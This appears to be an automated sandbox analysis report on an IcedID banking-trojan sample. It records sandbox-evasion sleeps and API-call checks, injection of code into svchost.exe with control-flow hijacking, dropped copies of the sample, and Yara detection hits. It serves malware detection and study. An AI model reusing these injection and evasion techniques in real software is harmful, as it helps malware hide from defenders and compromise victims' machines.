Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02B1205E	26_2_02B1205E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 28_2_02A5205E	28_2_02A5205E

Source: C:\Users\user\Desktop\GziaFibS0d.exe TID: 7024	Thread sleep count: 185 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6256	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe TID: 6572	Thread sleep count: 185 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6864	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe TID: 2236	Thread sleep count: 185 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 4384	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe TID: 4488	Thread sleep count: 185 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6356	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe TID: 6428	Thread sleep count: 185 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6700	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe TID: 6788	Thread sleep count: 185 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6304	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe TID: 6820	Thread sleep count: 185 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2596	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe TID: 1564	Thread sleep count: 185 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2928	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe TID: 4992	Thread sleep count: 185 > 30	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_3-1927

Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed

Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_16-2829
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_0-2828
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_4-2826
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_18-2834
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_6-2837
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_0253205E rdtsc

3_2_0253205E

Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_3-1878

Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node	graph_3-1840
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node	graph_3-2538
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node	graph_3-2385
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node	graph_5-1841
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node	graph_15-1840
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node	graph_15-2551
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node	graph_17-1840
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node	graph_19-1840
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\GziaFibS0d.exe

Code function: 0_2_00401AC0 LoadLibraryA,GetProcAddress,

0_2_00401AC0

Source: C:\Users\user\Desktop\GziaFibS0d.exe

Code function: 0_2_00401C79 GetProcessHeap,RtlAllocateHeap,

0_2_00401C79

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_0253205E rdtsc

3_2_0253205E

Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_00422152 mov eax, dword ptr fs:[00000030h]	0_2_00422152
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_00421D24 push dword ptr fs:[00000030h]	0_2_00421D24
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_004D04F4 mov eax, dword ptr fs:[00000030h]	0_2_004D04F4
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_004D00C6 push dword ptr fs:[00000030h]	0_2_004D00C6
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_00422152 mov eax, dword ptr fs:[00000030h]	4_2_00422152
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_00421D24 push dword ptr fs:[00000030h]	4_2_00421D24
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_006F04F4 mov eax, dword ptr fs:[00000030h]	4_2_006F04F4
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_006F00C6 push dword ptr fs:[00000030h]	4_2_006F00C6
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Code function: 6_2_00422152 mov eax, dword ptr fs:[00000030h]	6_2_00422152
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Code function: 6_2_00421D24 push dword ptr fs:[00000030h]	6_2_00421D24
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Code function: 6_2_005A04F4 mov eax, dword ptr fs:[00000030h]	6_2_005A04F4
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Code function: 6_2_005A00C6 push dword ptr fs:[00000030h]	6_2_005A00C6
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Code function: 16_2_00422152 mov eax, dword ptr fs:[00000030h]	16_2_00422152
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Code function: 16_2_00421D24 push dword ptr fs:[00000030h]	16_2_00421D24
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Code function: 16_2_020904F4 mov eax, dword ptr fs:[00000030h]	16_2_020904F4
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Code function: 16_2_020900C6 push dword ptr fs:[00000030h]	16_2_020900C6
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Code function: 18_2_00422152 mov eax, dword ptr fs:[00000030h]	18_2_00422152
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Code function: 18_2_00421D24 push dword ptr fs:[00000030h]	18_2_00421D24
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Code function: 18_2_005204F4 mov eax, dword ptr fs:[00000030h]	18_2_005204F4
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Code function: 18_2_005200C6 push dword ptr fs:[00000030h]	18_2_005200C6
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Code function: 20_2_00422152 mov eax, dword ptr fs:[00000030h]	20_2_00422152
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Code function: 20_2_00421D24 push dword ptr fs:[00000030h]	20_2_00421D24
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Code function: 20_2_005A04F4 mov eax, dword ptr fs:[00000030h]	20_2_005A04F4
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Code function: 20_2_005A00C6 push dword ptr fs:[00000030h]	20_2_005A00C6
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Code function: 22_2_00422152 mov eax, dword ptr fs:[00000030h]	22_2_00422152
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Code function: 22_2_00421D24 push dword ptr fs:[00000030h]	22_2_00421D24
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Code function: 22_2_006F04F4 mov eax, dword ptr fs:[00000030h]	22_2_006F04F4
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Code function: 22_2_006F00C6 push dword ptr fs:[00000030h]	22_2_006F00C6
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Code function: 24_2_00422152 mov eax, dword ptr fs:[00000030h]	24_2_00422152
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Code function: 24_2_00421D24 push dword ptr fs:[00000030h]	24_2_00421D24
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Code function: 24_2_005A04F4 mov eax, dword ptr fs:[00000030h]	24_2_005A04F4
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Code function: 24_2_005A00C6 push dword ptr fs:[00000030h]	24_2_005A00C6
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Code function: 27_2_00422152 mov eax, dword ptr fs:[00000030h]	27_2_00422152
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Code function: 27_2_00421D24 push dword ptr fs:[00000030h]	27_2_00421D24
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Code function: 27_2_020904F4 mov eax, dword ptr fs:[00000030h]	27_2_020904F4
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Code function: 27_2_020900C6 push dword ptr fs:[00000030h]	27_2_020900C6

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_02532973 lstrcpyW,lstrcatW,SetUnhandledExceptionFilter,	3_2_02532973
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_02692973 lstrcpyW,lstrcatW,SetUnhandledExceptionFilter,	5_2_02692973
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 15_2_027E2973 lstrcpyW,lstrcatW,SetUnhandledExceptionFilter,	15_2_027E2973
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_02EC2973 lstrcpyW,lstrcatW,SetUnhandledExceptionFilter,	17_2_02EC2973
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 19_2_02AC2973 lstrcpyW,lstrcatW,SetUnhandledExceptionFilter,	19_2_02AC2973
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 21_2_02F72973 lstrcpyW,lstrcatW,SetUnhandledExceptionFilter,	21_2_02F72973
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_2_02892973 lstrcpyW,lstrcatW,SetUnhandledExceptionFilter,	23_2_02892973
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02B12973 lstrcpyW,lstrcatW,SetUnhandledExceptionFilter,	26_2_02B12973
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 28_2_02A52973 lstrcpyW,lstrcatW,SetUnhandledExceptionFilter,	28_2_02A52973

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\GziaFibS0d.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2530000	Jump to behavior
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 7703D5D0	Jump to behavior
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2520000	Jump to behavior
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2690000	Jump to behavior
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 7703D5D0	Jump to behavior
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2680000	Jump to behavior
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 27E0000	Jump to behavior
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 7703D5D0	Jump to behavior
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 27D0000	Jump to behavior
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2EC0000	Jump to behavior
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 7703D5D0	Jump to behavior
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2EB0000	Jump to behavior
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2AC0000	Jump to behavior
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 7703D5D0	Jump to behavior
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2AB0000	Jump to behavior
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2F70000	Jump to behavior
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 7703D5D0	Jump to behavior
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2F60000	Jump to behavior
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2890000	Jump to behavior
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 7703D5D0	Jump to behavior
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2880000	Jump to behavior
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2B10000	Jump to behavior
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 7703D5D0	Jump to behavior
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2B00000	Jump to behavior
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2A50000	Jump to behavior
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 7703D5D0	Jump to behavior
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2A40000	Jump to behavior

Hijacks the control flow in another process

Source: C:\Users\user\Desktop\GziaFibS0d.exe	Memory written: PID: 6232 base: 7703D5D0 value: E9	Jump to behavior
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Memory written: PID: 6860 base: 7703D5D0 value: E9	Jump to behavior
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Memory written: PID: 5944 base: 7703D5D0 value: E9	Jump to behavior
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Memory written: PID: 6344 base: 7703D5D0 value: E9	Jump to behavior
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Memory written: PID: 3320 base: 7703D5D0 value: E9	Jump to behavior
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Memory written: PID: 5876 base: 7703D5D0 value: E9	Jump to behavior
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Memory written: PID: 5056 base: 7703D5D0 value: E9	Jump to behavior
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Memory written: PID: 3712 base: 7703D5D0 value: E9	Jump to behavior
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Memory written: PID: 6728 base: 7703D5D0 value: E9	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\GziaFibS0d.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2520000 protect: page read and write	Jump to behavior
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2530000 protect: page read and write	Jump to behavior
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2680000 protect: page read and write	Jump to behavior
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2690000 protect: page read and write	Jump to behavior
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 27D0000 protect: page read and write	Jump to behavior
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 27E0000 protect: page read and write	Jump to behavior
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2EB0000 protect: page read and write	Jump to behavior
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2EC0000 protect: page read and write	Jump to behavior
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2AB0000 protect: page read and write	Jump to behavior
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2AC0000 protect: page read and write	Jump to behavior
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2F60000 protect: page read and write	Jump to behavior
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2F70000 protect: page read and write	Jump to behavior
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2880000 protect: page read and write	Jump to behavior
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2890000 protect: page read and write	Jump to behavior
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2B00000 protect: page read and write	Jump to behavior
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2B10000 protect: page read and write	Jump to behavior
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2A40000 protect: page read and write	Jump to behavior
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2A50000 protect: page read and write	Jump to behavior

Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: GetLocaleInfoA,	0_2_0040996F
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: GetLocaleInfoA,	4_2_0040996F
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Code function: GetLocaleInfoA,	6_2_0040996F
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Code function: GetLocaleInfoA,	16_2_0040996F
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Code function: GetLocaleInfoA,	18_2_0040996F
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Code function: GetLocaleInfoA,	20_2_0040996F
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Code function: GetLocaleInfoA,	22_2_0040996F
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Code function: GetLocaleInfoA,	24_2_0040996F
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Code function: GetLocaleInfoA,	27_2_0040996F

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_02532833 GetComputerNameExW,LookupAccountNameW,GetSystemTimeAsFileTime,

3_2_02532833

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_025326ED memset,RtlGetVersion,

3_2_025326ED

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_02532833 GetComputerNameExW,LookupAccountNameW,GetSystemTimeAsFileTime,

3_2_02532833

Stealing of Sensitive Information

Yara detected IcedID

Source: Yara match	File source: 6.2.tsuvgo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.uvtsuvts.exe.5c6142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.ziczv.exe.716142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.ayxuiczvtsui.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.tsuvgo.exe.636142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.tfykdkdkdk.exe.546142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.GziaFibS0d.exe.616142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.czipqtsh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.ayxuiczvtsui.exe.616142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.zipdk.exe.20b6142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.GziaFibS0d.exe.616142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.tfykdkdkdk.exe.546142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.tsuvgo.exe.636142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rencz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.ayxuiczvtsui.exe.616142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.czipqtsh.exe.20b6142.0.raw.unpack, type: UNPACKEDPE
